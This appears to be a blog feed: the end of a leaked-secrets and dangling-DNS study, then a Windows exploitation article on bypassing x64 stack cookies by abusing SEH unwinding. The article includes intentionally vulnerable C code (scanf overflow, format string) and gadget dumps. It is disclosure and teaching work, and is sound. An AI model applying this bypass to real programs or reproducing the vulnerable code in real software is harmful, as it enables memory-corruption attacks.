When debugging, I noticed something weird. For some reason, posting a Gist at the web interface, https://gist.github.com still worked. Even stranger? When I visited a public Gist in an incognito session, I faced a 404 error. It turns out that when your account is suspended, GitHub hides it (and any derivative public content like gists) from every other user. You're basically shadow banned! What's interesting was that they still allowed you to upload content through the UI, but not the API. Whatever the reason, this got me thinking...

Who needs an API? Using Python Selenium, a library to control a browser in test suites, I created a script that automatically logged me into GitHub and used the undocumented API to publish a Gist. While my test account was still shadow banned, this was actually a feature! How? I could now create public gists that triggered secret scanning without any risk of exposure!! (also why I don't mind sharing the account's name or ID)

I used GitHub to revoke most keys I discovered, if the provider had enrolled in their program, going well beyond the minimum by protecting victims! Above is the small website I included in the name of the Gist which is embedded in key exposure notification emails. Today, any new secrets leaked on VirusTotal and a few other platforms are automatically reported, helping mitigate abuse.

Working With Vendors

Besides GitHub, I also worked with several partners directly to report leaked key material.

How Providers Should Respond

To start, I'd like to give a special thanks to the vendors who worked with me to help protect their customers. Above is an example of an endpoint for revoking leaked OpenAI keys. Unfortunately, the process was not so smooth in all cases. For example, AWS, the largest cloud provider by market share, refused to share the endpoint used to report leaked secrets, despite the fact we could access it indirectly by posting a secret in a gist. This was nothing but politics getting in the way of customer security.

To add insult to injury, when AWS detects a leaked secret on GitHub, they do not revoke it. Instead, they restrict the key and create a support case with the customer who might not even see it. The former sounds good in theory, but in practice, limits very little. It really only prevents write access, like being able to start an EC2 instance or upload files to S3 buckets. There is almost no restriction to downloading data, like a customer database backup on an S3 bucket.

Before I developed the GitHub reporting system, I used to manually email batches of keys to AWS. In late July, while preparing key metrics, I noticed a few keys in my database that I thought I had seen before. In fact, I had seen them! Many new keys my system detected were the same keys I had reported to AWS months before. What was going on?

According to my estimates, ~32% of the keys I reported to you over 2-3 months ago are unrevoked and were forgotten about by your fraud team. The ~32% figure is based on the number of unique keys I reported to you by email which again appeared active at the end of July. It appears that the support cases your fraud team created in many cases were automatically resolved, leaving the keys exposed for abuse.
~ Email to AWS Security

AWS not only fails to revoke publicly leaked secrets, but the support cases they create are horribly mismanaged. It turned out that ~32% of the keys I reported to AWS were not addressed 4 months later. The reason? If the customer didn't respond, the support case for the leaked secret is automatically closed! You can see one example above I obtained while investigating a previously reported secret.

I've continued to work with AWS on these concerns, but have yet to see any meaningful action. I suspect the choice to leave keys exposed for abuse is due to the risk of impacting legitimate workflows that depend on the key. This would be a fair concern, but what's worse, a short-term service disruption or the theft of sensitive user data?

How do I know for a fact AWS' approach is unreasonable? Every other vendor enrolled in secret validity checks in GitHub's program I tested revoked leaked keys, including AWS' direct competitor, Google Cloud. The ~32% unrevoked figure after 4 months also worries me because I wonder if it applies to keys on GitHub, which are easy to spot. I think this could end very badly for AWS, but at the end of the day, this is their call.

Where Do We Go From Here?

Takeaways

Security at Scale Is Not Only Offensive.
- We can use the same techniques we use to find these issues to also protect against them.
Incentives Are Everything.
- Dangling resources and leaked secrets are technically the customer's fault, but the wrong incentives are what enable them at scale.
- At scale, the path of least resistance matters. For example, many platforms offer API tokens as default mechanisms for authentication. When it's easy to hardcode secrets, developers will hardcode secrets.
- DNS was created before cloud computing. It needs to be modernized. For example, given cross-industry collaboration in other areas, could we tie DNS records to cloud assets, automatically deleting (or at least alerting) when an associated asset is destroyed?
What Cloud Providers Are Missing
- Limited collaboration to solve issues at the ecosystem layer.
- Ineffective mitigations to these common vulnerability classes. We've known about dangling DNS records for over a decade, yet the problem only seems to have grown.
- There is a lack of urgency to address leaked secrets. For example, AWS is one of the only participants in the GitHub secret scanning program who does not automatically revoke keys that are leaked to the world. This puts customers at extreme risk.
How Do We Fix It? Make the path of least resistance secure by default.
- Hardcoded Secrets: Deprecate tokens for authentication. Some use cases may not be able to completely eradicate them, but add barriers to using them. Use certificate-based authentication or other secure alternatives.
- Hardcoded Secrets: Make it hard to abuse tokens. Example include clearly separating tokens with read-only capability with write-only capability.
- Dangling Resources: Perhaps we need a new standard for tying DNS records to cloud resources. At minimum, Cloud & DNS Providers should collaborate.

How Do I Protect My Organization?

In general, make it as hard as possible to insecurely use secrets within your organization. The trivial approach to solving leaked secrets within your organization is to use existing tooling to scan your code. This does not address the root cause of leaked secrets. To prevent them, the most effective approach is to focus on design decisions to disincentivize insecure usage of credentials.

Start by understanding "how is my organization currently managing secrets?"

For example, if a developer requires access to a backend service, what does the process for obtaining an API key look like?
Who is responsible for managing credentials (if anyone)?
What security practices is your organization following around leaked secrets?
Who has the authority to specify company policy?

Have a central authority for managing secrets. OWASP has an incredible cheat sheet on this. I strongly recommend following their advice.

For example, have an internal service that all applications must go through to interact with a backend server.
You can either have this service provide other applications with credentials to use or for an additional layer of security, never let the API key leave the internal service.
Frequently rotate your credentials. With a central authority for secrets, automating this process is much more straightforward.
Ensure that this service has extensive auditing and logging. Look into detecting anomalous behavior.
Use a hardware medium (TPM) to store your secrets where possible.
Assign an expiration date for your keys to force a regular review of access.

For dangling domains, there is no one size fits all. Generally, you should track the cloud resource associated with any DNS record you create, but this will vary dependent on your environment. I believe a better solution would come at a platform/provider level, but this requires cross-industry collaboration.

Cloud Providers

Automatically revoke leaked secrets reported to your organization.
If you are running a platform that provides API access for your customers, there is a lot you can do to make it harder for your customers to insecurely implement your API.
Allow and encourage customers to rotate their API keys automatically.
Allow and encourage customers to use cryptographic keys that can be stored in hardware to sign API requests.
Make your API keys contain a recognizable pattern. Makes it far easier for defenders to find leaked secrets.
Implement detections for anomalous activity.
- If an API key has only performed a limited number of operations for a long period of time and suddenly begins to be used heavily, consider warning the customer about the increased usage.
- If an API key has been used by a limited number of IP addresses for a long period of time and is used from an unrecognized location, consider warning the customer.
- Plenty more approaches depending on the service.
Customers: Hold the platforms you use accountable for these practices.

Conclusion

This article explored two common, yet critical vulnerability classes: dangling DNS records and leaked secrets. The former was well traversed, but served as a useful example of applying what I call the "security at scale mindset". Instead of starting with a target, we start with the vulnerability. We demonstrated how dangling records are still a prominent issue across the Internet, despite existing for over a decade.

We then targeted hardcoded secrets, an area far less explored. By leveraging unconventional "big data" sources, in this case virus scanning platforms, we were able to discover secrets at an unprecedented scale. Like dangling DNS records, the root cause of these systemic weaknesses are poor incentives. The status quo of using a short token for authentication incentivizes poor security practices, like embedding them in raw code, no matter how much we warn against it.

We finished the project by going end-to-end. Not only did we discover these problems, we mitigated a majority by taking advantage of GitHub's existing relationships and automating their UI to trigger secret revocation. It's rare to have an opportunity to directly protect victims, yet so important to deterring abuse.

I'd encourage you to think about the mindset we applied in this article for other types of bugs. Examples of other interesting data sources include netflow data and OSINT/publicly available data you can scrape. In general, here are two key areas to focus on:

Break down traditional methods of finding a vulnerability into steps.
Correlate steps with large data sets, regardless of their intended usage.

I hope you enjoyed this research as much as I did! I'm so glad to have had the opportunity to share this work with you. Would love to hear what you think- feel free to leave a reply on the article tweet!

Abusing Exceptions for Code Execution, Part 2

Bill Demirkapi — Mon, 30 Jan 2023 15:01:24 GMT

Full disclosure- Microsoft hired me following part 1 of this series. This research was conducted independently, and a vast majority of it was completed before I joined. Obviously, no internal information was used, and everything was built on public resources.

In Abusing Exceptions for Code Execution, Part 1, I introduced the concept of Exception Oriented Programming (EOP), which was a method of executing arbitrary operations by chaining together code from legitimate modules. The primary benefit of this approach was that the attacker would never need their shellcode to be in an executable region of memory, as the technique relied on finding the instructions of their shellcode in existing code.

The last article primarily focused on abusing this technique when you already have some form of code execution. Although powerful for obfuscation and evasion, the use cases provided would only be relevant when an attacker had already compromised an environment. For example, how does EOP compare to existing exploitation techniques such as Return Oriented Programming (ROP)? In this article, we'll explore how the concepts behind Exception Oriented Programming can be abused when exploiting stack overflow vulnerabilities on Windows.

Background

Before we can get into how EOP can help exploit stack-based attacks, it's important to know the history of the mitigations we are up against. I assume you already have familiarity with the OS-agnostic basics, such as ASLR and DEP.

Security Cookies

Security cookies (aka "stack canaries") are a compiler mitigation introduced around two decades ago. Here is a helpful summary from Microsoft's documentation:

On functions that the compiler recognizes as subject to buffer overrun problems, the compiler allocates space on the stack before the return address. On function entry, the allocated space is loaded with a security cookie that is computed once at module load. On function exit, and during frame unwinding on 64-bit operating systems, a helper function is called to make sure that the value of the cookie is still the same. A different value indicates that an overwrite of the stack may have occurred. If a different value is detected, the process is terminated.

Security cookies are relatively straightforward. By placing a "random" cookie next to the return address on the stack, attackers exploiting stack overflow vulnerabilities face a significant problem- how do you modify the return address without failing the cookie check?

Over the years, there has been lots of work put into bypassing these security cookies. I found this helpful overview from the Corelan team written in 2009. Let's review some of the techniques they discuss that are still relevant to this day:

This mitigation is irrelevant if you have an overflow vulnerability in a function that does not have a security cookie check (i.e. because there are no string buffers).
If you have an information disclosure primitive, you could attempt to leak the security cookie for the current function from the stack or the security cookie in the .data section.
- For example, if you had a string buffer and a method of getting the application to "print" that string, you could overflow the buffer up to the security cookie such that there is no NULL terminator. When the string is "printed", all the bytes of the cookie until a NULL terminator would be returned as a part of the string.
If you already have an arbitrary "write-what-where" primitive and know the location of the security cookie, you can overwrite it with your own, allowing you to predict the "correct" value to place on the stack.
You can still overwrite local variables on the stack to hijack control flow.
- For example, if a pointer was stored on the stack (before the overflow'd variable) used in a desirable operation like memcpy after the overflow occurs, you could overwrite this pointer without corrupting the security cookie.
- Another example would be objects with "virtual tables" on the stack that we can overwrite. If an object's virtual table is used after the overflow occurs, an attacker could influence the target of those virtual calls. Of course, this would likely be subject to control-flow integrity mitigations like Control Flow Guard (or xFG) on Windows.

Outside of these approaches, there has been extensive research into abusing exception handling. Before mitigations such as SafeSEH and SEHOP, which we will discuss soon, attackers in the context of 32-bit applications could modify "exception registration records" on the stack. The Corelan team covered this path of exploitation in a separate blog. More recently, however, @_ForrestOrr wrote in detail about SEH hijacking in his article about memory corruption bugs on Windows.

SEH Hijacking and the Mitigations Against It

In 32-bit applications, exception registration records contain a pointer to the "next" SEH record on the stack and a pointer to the exception handler itself. Back in the day, attackers could hijack control flow even with security cookies by:

Replacing the exception handler on the stack with their own.
Triggering an exception before the security cookie check.

This would allow the attacker to call an arbitrary handler with partial control over the passed arguments.

SafeSEH

To protect against this technique, Microsoft introduced a mitigation called SafeSEH. At a high level, "legitimate" exception handlers are built into the binary at compile-time. Although an attacker can still replace the exception handler on the stack, if it is not in the module's list of exception handlers, a STATUS_INVALID_EXCEPTION_HANDLER exception is raised.

SEHOP

SEH Overwrite Protection (SEHOP) is another mitigation that would protect 32-bit applications from having their exception handlers overwritten- without requiring them to be recompiled. This approach works by adding an exception registration record at the bottom of the chain and making sure it is "reachable" when an exception occurs. Remember that besides the exception handler, the registration record contains a pointer to the "next" SEH record. If an attacker corrupts this "next" pointer, the chain is broken, and this final item is not reachable, preventing the attack. Of course, if an attacker can predict the "next" pointer successfully, this mitigation can be evaded.

64-bit Applications

64-bit applications are already protected against this attack by default, which we briefly mentioned in the last article of this series:

Nowadays SEH exception handling information is compiled into the binary, specifically the exception directory, detailing what regions of code are protected by an exception handler. When an exception occurs, this table is enumerated during an "unwinding process", which checks if the code that caused the exception or any of the callers on the stack have an SEH exception handler.

Since the exception handlers are built into the binary itself, there is no exception registration record on the stack that an attacker can corrupt. This prevents the existing approaches to SEH hijacking entirely.

The Exception Directory

Let's talk more about how the exception directory works in 64-bit applications.

The location of the exception directory can be retrieved by parsing the optional header of the binary, specifically the IMAGE_DIRECTORY_ENTRY_EXCEPTION data directory. This directory is an array of IMAGE_RUNTIME_FUNCTION_ENTRY structures. You can calculate the number of entries by dividing the directory size by the size of the IMAGE_RUNTIME_FUNCTION_ENTRY structure.

Each entry contains a begin address, end address, and the offset of an UNWIND_INFO structure. The begin/end addresses specify the region of code that the given entry provides information for. The UNWIND_INFO structure is represented by the following:

typedef struct _UNWIND_INFO {
	unsigned char Version : 3;
	unsigned char Flags : 5;
	unsigned char SizeOfProlog;
	unsigned char CountOfCodes;
	unsigned char FrameRegister : 4;
	unsigned char FrameOffset : 4;
	UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;

The commented region is still present in the structure, but its location depends on the size of the dynamic UnwindCode array. Note that most functions in an application will have a dedicated entry. This is because even if the function does not need to handle exceptions, each entry contains essential information for how the function should be unwound. For example, if function A contains an exception handler, calls function B, which does not, and an exception occurs, we still need to be able to unwind the stack to get to function A's handler.

Of note, the Flags field of the structure can contain the following:

UNW_FLAG_NHANDLER - The function has no handler.
UNW_FLAG_EHANDLER - The function has an exception handler that should be called.
UNW_FLAG_UHANDLER - The function has a termination handler that should be called when unwinding an exception.
UNW_FLAG_CHAININFO - The FunctionEntry member is the contents of a previous function table entry.

We can tell if a given function contains an exception handler by checking if the Flags field specifies UNW_FLAG_EHANDLER.

The structure's dynamic UNWIND_CODE array represents the operations needed to "unwind"/undo the changes a given function's prolog has made to the stack. We will talk about these operations in a later section when they become relevant.

typedef struct _UNWIND_INFO {
	...
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;

Going back to the definition of the UNWIND_INFO structure, note that there is a single field dedicated to the offset of the "exception handler". When you create some code with an SEH try/except block, the address of your exception handler is not what goes into this field. Instead, every language (including C/C++) is responsible for defining a "language-specific" handler. In our case, ExceptionHandler points to the __C_specific_handler. These handlers have the following type definition:

typedef EXCEPTION_DISPOSITION (*PEXCEPTION_ROUTINE) (
    IN PEXCEPTION_RECORD ExceptionRecord,
    IN ULONG64 EstablisherFrame,
    IN OUT PCONTEXT ContextRecord,
    IN OUT PDISPATCHER_CONTEXT DispatcherContext
);

typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;

The __C_specific_handler handler for C/C++ leverages the ExceptionData field to store a SCOPE_TABLE structure. Like the IMAGE_RUNTIME_FUNCTION_ENTRY parent structure, each ScopeRecord has a begin/end address, but this time we have a handler and jump target as well. The begin/end address specifies the scope or "region of code" to "protect". The last two fields store offsets to your SEH exception filter and exception handler.

int main() {
	__try {
		*(int*)0 = 0xDEADBEEF;
	} __except(MyExceptionFilter()) {
		printf("My exception handler!\n");
	}
	return 0;
}

Exception filters go inside the parenthesis for your __except block. In this example, MyExceptionFilter is responsible for determining whether the __except handler block should be called for a given exception. Exception filters often perform conditional checks, such as whether the exception code matches something specific. Filters can return the following results:

EXCEPTION_CONTINUE_EXECUTION - Indicates that execution should continue where the exception occurred.
EXCEPTION_CONTINUE_SEARCH - Continue the search for an exception handler.
EXCEPTION_EXECUTE_HANDLER - Execute the handler block. In the example code, My exception handler! would only be printed if MyExceptionFilter returned this value.

Exception filters and handlers are defined in the ScopeRecord structure as the HandlerAddress and JumpTarget offsets. If the HandlerAddress is 1, then this means execute the exception handler (JumpTarget) for all exceptions.

You can find the source code for __C_specific_handler included with the MSVCRT since it needs to support static compilation into binaries. On my installation of Visual Studio, the relevant source file is located at C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\crt\src\amd64\chandler.c.

The Exception Dispatching Process

Before we continue, I want to clarify a fundamental concept we need to understand about the UNW_FLAG_EHANDLER vs UNW_FLAG_UHANDLER flags in the UNWIND_INFO structure.

When an exception occurs, RtlDispatchException is the first function to be called. RtlDispatchException will create a temporary copy of the CONTEXT record (containing the state of registers, etc.) and "virtually unwind" the stack searching for exception handlers to call. Unwinding means undoing the modifications done to the stack (and registers) by the prolog/epilog of functions in the call stack. If a function has a corresponding UNWIND_INFO structure with the UNW_FLAG_EHANDLER flag, its exception handler is called.

If the handler returns EXCEPTION_CONTINUE_EXECUTION, execution continues right where the exception occurred (which means the exception was "handled"). Note that the changes made to the temporary CONTEXT copy will not be reflected if execution were to continue (i.e. if virtual unwind modified Rcx register, that doesn't change Rcx when execution continues).

If the handler returns EXCEPTION_CONTINUE_SEARCH, the virtual unwinding process continues, looking for the next function with the UNW_FLAG_EHANDLER flag.

In the context of the C-specific language handler, the exception filter specified by the "handler address" can return the two results above and EXCEPTION_EXECUTE_HANDLER. In this case, even though we are in the context of RtlDispatchException, __C_specific_handler will call RtlUnwind to unwind execution to the handler specified by the "jump target".

RtlUnwind is incredibly similar to RtlDispatchException, but it has a few notable differences. First, the context record modified by the unwinding process in this function will be reflected when execution continues. This is because RtlUnwind is intended to get both the stack and registers into the state corresponding to the target exception handler's function. So, for example, if you had an exception handler in a parent function of where the exception occurred, RtlUnwind is responsible for making sure that Rsp is corrected such that you can access any local variables from the context of your parent function as well as the values in its nonvolatile registers.

The second significant difference is that only "termination" or unwind handlers are called, aka functions with an UNWIND_INFO structure specifying the UNW_FLAG_UHANDLER flag. A good example of an unwind handler would be a __try/__finally block intended to free resources rather than catch an exception.

RtlUnwind will unwind the stack, calling relevant unwind handlers until the "target frame" is reached. The target frame is generally the stack frame for the exception handler it is trying to unwind to. When reached, RtlUnwind passes the modified context record to RtlRestoreContext, which is responsible for continuing execution at the target handler.

We're going to cover RtlDispatchException and RtlUnwind further in later sections, but if you'd like to learn more outside of this article, check out the publicly leaked Windows Research Kernel (WRK), which contains the source code for RtlDispatchException and RtlUnwind.

Although we've gone over how Structured Exception Handling works "under the hood" to an extent, much was simplified for the purposes of this article. If you're interested in learning more, I would encourage you to check out this article by Ry Auscitte, who goes into even more detail.

We've explored the existing mitigations against stack-based attacks and how Structured Exception Handling works. In the following sections, we'll discuss the practical approaches I propose to simplify the exploitation of stack overflow vulnerabilities.

Bypassing Security Cookies

Example

void GetString() {
	char tempBuffer[16];

	scanf("%s", tempBuffer);
	printf(tempBuffer);
}

int main() {
	__try {
		GetString();
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("Something bad happened!\n");
	}
	return 0;
}

Let's start with an example of a simple vulnerable application I've compiled using Clang/LLVM in Visual Studio. The buffer overflow is simple, scanf reads a string into the tempBuffer stack variable without any bound checks.

If we take a look at the function in IDA Pro, there is a significant challenge preventing us from exploiting this overflow primitive- the security cookie check at the epilogue of the function. Since the return address is right "after" the security cookie on the stack, we couldn't modify it without also corrupting the cookie. This would prevent us from gaining code execution since the program would crash before the ret instruction.

What can we do? Existing approaches to these scenarios include all of the methods we discussed to bypass security cookies, such as trying to leak it. For example, if the attacker had access to the stdout of this program, they could use printf to leak the security cookie on the stack. However, the issue they'd run into is that the program would exit soon after. Even if they could trigger another execution, a new random cookie would be generated.

This is where our new methodology can start to shine. Our exploit fails if we corrupt the return address and hit the __security_cookie_check. What if we... corrupted the stack and triggered an exception (i.e with a bad format string)?

int main() {
	__try {
		GetString();
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("Something bad happened!\n");
	}
	return 0;
}

Since main has a "catch-all" exception handler, the program would print Something bad happened! and return. The security cookie check would never be reached because the exception redirected execution to the handler! Also, because main does not have any stack variables itself, it has no security cookie check. If we used our overflow to corrupt the return address of main rather than GetString, once main returns after the exception is handled, we'd gain control over what code is executed!

This example relies on an overflow vulnerability, a method of triggering an exception, and a parent function having a "catch-all" exception handler. These first two requirements are relatively straightforward as 1) security cookies are only relevant for overflow scenarios, and 2) causing an exception is relatively easy if you can corrupt local variables.

What about the last requirement that the context in which you have an overflow vulnerability also contains a parent function with a catch-all handler? That is a much higher bar. Fortunately, this is where we can abuse how unwinding works.

How did the unwinding process determine that it should call main's exception handler? When main called GetString, the Rip register was pushed on the stack as the return address GetString should return to. The unwinding process uses this return address on the stack while searching for a parent function that contains an exception handler.

If we have a leak of the location for any module in the process that contains a C-specific exception handler where 1) the exception filter returns EXCEPTION_EXECUTE_HANDLER and 2) the handler will ret without a security cookie check, then we don't need a desirable parent in our stack at all!

By replacing the parent return address on the stack with an address protected by a "desirable" exception handler which meets the previous requirements, the unwinding process will pass the exception to the fake parent's handler, which will ret into an address we control on the stack.

Finding these "desirable" handlers can be easier than it may seem. For example, if we statically compile the previous barebone example application, we already have several candidates to choose from.

[RUNTIME_FUNCTION]
... 
	[UNWIND_INFO]
	...  
	Flags: UNW_FLAG_EHANDLER
	Unwind codes: .ALLOCSTACK 0x18
		[SCOPE_TABLE]
		Scope 0
		BeginAddress:                  0x16cb
		EndAddress:                    0x1755
		HandlerAddress:                0x10314
			push rbp
			mov rbp, rdx
			mov rax, qword ptr [rcx]
			xor ecx, ecx
			cmp dword ptr [rax], 0xc0000005
			sete cl
			mov eax, ecx
			pop rbp
			ret 
		JumpTarget:                    0x1755
			xor al, al
			add rsp, 0x18
			ret

Above is an excerpt from a tool I wrote to dump C-specific exception handlers. These structures correspond to the __scrt_is_nonwritable_in_current_image function in the MSVCRT. Look at the exception filter's disassembly. If we can generate an access violation exception (i.e. by reading/writing an invalid pointer), the exception handler (jump target) would be executed, returning to any address of our choice.

Theory

As we covered earlier, using exceptions to escape security cookies is not new. In the past, however, the methods have involved x86-specific weaknesses, such as the exception handler pointer being stored on the stack. This new approach works with 64-bit applications by leveraging existing legitimate exception handlers.

Taking a step back and looking at this attack as a generic methodology. If you...

Have a stack overflow primitive.
Can trigger an exception before a security cookie check.
Know the location of any module in the process that contains a region of code protected by an exception handler...
- Whose C-specific exception filter (handler address) returns EXCEPTION_EXECUTE_HANDLER for the exception you can generate.
- Whose C-specific exception handler (jump target) ret's without a security cookie check.
Meet specific compiler requirements (discussed later).

You can spoof your call stack to include a region of code protected by the desirable exception handler, trigger an exception, and bypass the security cookie check entirely.

Are All Compilers Impacted?

When I was parsing the exception handlers registered for modules such as ntdll.dll, I was confused to see that only 203 out of 713 exception handlers were set to the expected __C_specific_handler function. Here is a breakdown of the handlers for my version of ntdll.dll:

713 total runtime function entries with a registered exception or termination handler
203 entries matched __C_specific_handler
454 entries matched __GSHandlerCheck?
48 entries matched __GSHandlerCheck_SEH?
5 entries matched LdrpICallHandler
1 entry matched KiUserApcHandler
1 entry matched RtlpExceptionHandler
1 entry matched RtlpUnwindHandler

The two __GSHandlerCheck functions caught my eye. What were these exception handlers being used for?

__GSHandlerCheck - This handler takes an undocumented structure from the UNWIND_INFO's ExceptionData field and passes it to __GSHandlerCheckCommon. If this call succeeds, __GSHandlerCheck returns EXCEPTION_EXECUTE_HANDLER.
- __GSHandlerCheckCommon parses this undocumented structure to find the location of the security cookie for the function the exception was occurring in. Then, it emulates the cookie check usually found in the epilog of a function by XOR'ing the cookie from the stack and jumping to __security_check_cookie.
__GSHandlerCheck_SEH - This function does nearly the same thing as __GSHandlerCheck, except after checking the security cookie, it calls __C_specific_handler.

Taking a look at the functions that __GSHandlerCheck and __GSHandlerCheck_SEH were assigned to revealed that all of them had security cookie checks built into them. The __GSHandlerCheck_SEH variant appeared to be used in functions that also had an exception handler, whereas __GSHandlerCheck was used in functions with only a security cookie check.

MSVC Mitigation

void GetString() {
	char tempBuffer[16];

	scanf("%s", tempBuffer);
	printf(tempBuffer);
}

This was a smart mitigation by Microsoft. The purpose behind these exception handlers is to prevent attackers from being able to escape a security cookie check by causing an exception. For example, take a look at what happens when I compile the previous GetString function using the MSVC++ compiler:

Although GetString does not use an exception handler, it is built with one anyway. The disassembly above shows that the unwind handler is defined as __GSHandlerCheck. Even if an attacker could cause an exception in GetString (i.e. with a bad format string), before unwinding the stack, __GSHandlerCheck would be called, and a security cookie check would occur- preventing the bypass. Additionally, there are __GSHandlerCheck variants for several other common "language-specific" handlers such as __GSHandlerCheck_EH for C++'s __CxxFrameHandler3.

Outside of our example, this is an effective mechanism that makes abuse of exceptions in applications that use the MSVC compiler significantly more difficult. With this mitigation, an attacker would need to predict the security cookie of the function they can cause an overflow in. Note that this doesn't mean an attacker knows the security cookie for all functions.

If an attacker could get around the initial security cookie, they could likely leverage ROP. There are some advanced attacks with exceptions we'll discuss that can provide more powerful primitives than ROP, however. Additionally, as we'll review in a later section, exceptions can be a solid alternative to ROP in environments that use the MSVC compiler and hardware mitigations like Intel's Control Flow Enforcement Technology (CET).

What About Other Compilers?

A noteworthy caveat in my last paragraph is that Microsoft's mitigation makes our lives harder only in applications that use MSVC. What about applications created with other compilers for Windows?

Clang/LLVM

For the GetString original example, I used Clang/LLVM in Visual Studio, which does not use the __GSHandlerCheck mitigation for functions with security cookie checks. This means that any application compiled with Clang/LLVM at the time of writing is vulnerable.

GCC

Although GCC does not support SEH-style __try/__except blocks, it still uses SEH for C++ exceptions. We can replace our main function with a C++ try/catch block to compile the application.

As you can see, there is no unwind block for GetString, demonstrating that applications compiled for GCC are also vulnerable to this attack.

Honorable Mentions

A side note- several compiled languages outside of C/C++ for Windows, like Rust and GoLang, do not have an equivalent to the __GSHandlerCheck mitigation. But, of course, these languages are designed to be inherently safe against these vulnerabilities in the first place, assuming developers don't use the unsafe functionality.

Most Applications Use MSVC, Though… Right?

It may seem as if the threat of this attack is reduced on Windows because of the MSVC mitigation. However, although many applications are compiled with MSVC, Clang/GCC is still frequently used, especially for cross-platform applications.

I'll give you a great example. What if I told you that the top three browsers on Windows are vulnerable to this attack?

Google Chrome, Firefox, and (ironically) Microsoft Edge use Clang/LLVM, which does not have a __GSHandlerCheck mitigation equivalent (yet). This means that if there was a stack overflow vulnerability in the browser you might be reading this article on, an attacker could potentially abuse exceptions to escape security cookie checks!

The wrong takeaway would be that developers should use MSVC over its alternatives or that this is somehow the fault of Clang/GCC's developers. Yes, applications compiled with Clang/GCC are not protected against this attack at the time of writing, but that can change. Microsoft should proactively work with compiler developers to share the mitigations developed for MSVC. This would only help make the ecosystem more secure as a whole.

… Microsoft Has Known About This for How Long?

One question that caught my curiosity was, "How long has Microsoft known about the attack of abusing exceptions to escape security cookies?". Several old versions of 64-bit binaries I looked at seemed to contain the __GSHandlerCheck function.

For a more conclusive answer around a date, I sought out several old versions of Windows and checked if their ntdll binaries contained __GSHandlerCheck. I was shocked to find an ntdll binary signed in 2008 for Windows Vista with this mitigation in place. This suggests that Microsoft has known about this attack for at least 15 years!

Now that we've introduced the trivial implementation of Exception Oriented Programming for stack overflow vulnerabilities, let's revisit the SEH unwinding process and explore advanced attacks.

An Alternative to ROP

Background

Unwind Operations

typedef struct _UNWIND_INFO {
	unsigned char Version : 3;
	unsigned char Flags : 5;
	unsigned char SizeOfProlog;
	unsigned char CountOfCodes;
	unsigned char FrameRegister : 4;
	unsigned char FrameOffset : 4;
	UNWIND_CODE UnwindCode[1];
/*  UNWIND_CODE MoreUnwindCode[((CountOfCodes+1)&~1)-1];
 *  union {
 *      OPTIONAL unsigned long ExceptionHandler;
 *      OPTIONAL unsigned long FunctionEntry;
 *  };
 *  OPTIONAL unsigned long ExceptionData[];
 */
} UNWIND_INFO, * PUNWIND_INFO;

In an earlier section about the exception directory and unwind info structure, we skipped over the UNWIND_CODE structure as it was irrelevant at the time.

typedef union _UNWIND_CODE {
	struct {
		unsigned char CodeOffset;
		unsigned char UnwindOp : 4;
		unsigned char OpInfo : 4;
	};
	unsigned short FrameOffset;
} UNWIND_CODE, *PUNWIND_CODE;

UNWIND_CODE entries specify the operations required to "unwind" (or undo) the changes a given function's prolog has made to registers or the stack. Here are the various documented operations an UNWIND_CODE structure can contain:

UWOP_PUSH_NONVOL - This operation specifies that a nonvolatile integer register was pushed to the stack. The OpInfo field specifies what register was pushed. For example, if the prolog of a function contained push rbp, you would see a corresponding UWOP_PUSH_NONVOL operation.
UWOP_ALLOC_LARGE / UWOP_ALLOC_SMALL - These operations specify that a specific size was allocated on the stack. You would expect to see these operations for instructions like sub rsp, 0xABC.
UWOP_SET_FPREG - Specifies the frame pointer register and some offset of rsp. This operation is only used in functions that need a frame pointer in the first place, such as those that need dynamic stack allocations. An example instruction for this operation would include lea rbp, [rsp+offset].
UWOP_SAVE_NONVOL / UWOP_SAVE_NONVOL_FAR - These operations specify that a nonvolatile integer register was saved on the stack using a mov instruction rather than a push. Similar to UWOP_PUSH_NONVOL, the specific register is contained in the OpInfo field.
UWOP_SAVE_XMM128 / UWOP_SAVE_XMM128_FAR - These operations are used to save XMM register values.
UWOP_PUSH_MACHFRAME - This is a special type of operation that indicates the function is a hardware interrupt or exception handler that receives a "machine frame" from the stack. This frame contains information about the state of various registers at the time the interrupt/exception occurred. An example of a function with this operation in user-mode includes ntdll!KiUserExceptionDispatcher.

With a basic understanding of how the dispatcher can unwind the effects of various functions, let's go through an example.

Dumping the Exception Directory of NTDLL

As a small demo of everything we've learned, we can use the Python pefile package to enumerate the exception directory of any PE module. Here is a small script that will print the runtime function entries of a binary specified by the first argument.

import sys
import pefile

pe = pefile.PE(sys.argv[1])
for runtime_function in pe.DIRECTORY_ENTRY_EXCEPTION:
    print("\n".join(runtime_function.struct.dump()))
    if hasattr(runtime_function, "unwindinfo") and \
       runtime_function.unwindinfo is not None:
        print("\n\t".join(runtime_function.unwindinfo.dump()))

The ntdll.dll on my machine produced 4884 unique runtime function entries. This doesn't mean that there are 4884 functions in ntdll.dll with an exception handler- entries often only contain the operations needed to unwind a given function.

[RUNTIME_FUNCTION]
0x168A40   0x0   BeginAddress:                  0x4C270   
0x168A44   0x4   EndAddress:                    0x4C45F   
0x168A48   0x8   UnwindData:                    0x146D50  
    [UNWIND_INFO]
    0x143F50   0x0   Version:                       0x1       
    0x143F50   0x0   Flags:                         0x3       
    0x143F51   0x1   SizeOfProlog:                  0x1F      
    0x143F52   0x2   CountOfCodes:                  0x8       
    0x143F53   0x3   FrameRegister:                 0x0       
    0x143F53   0x3   FrameOffset:                   0x0       
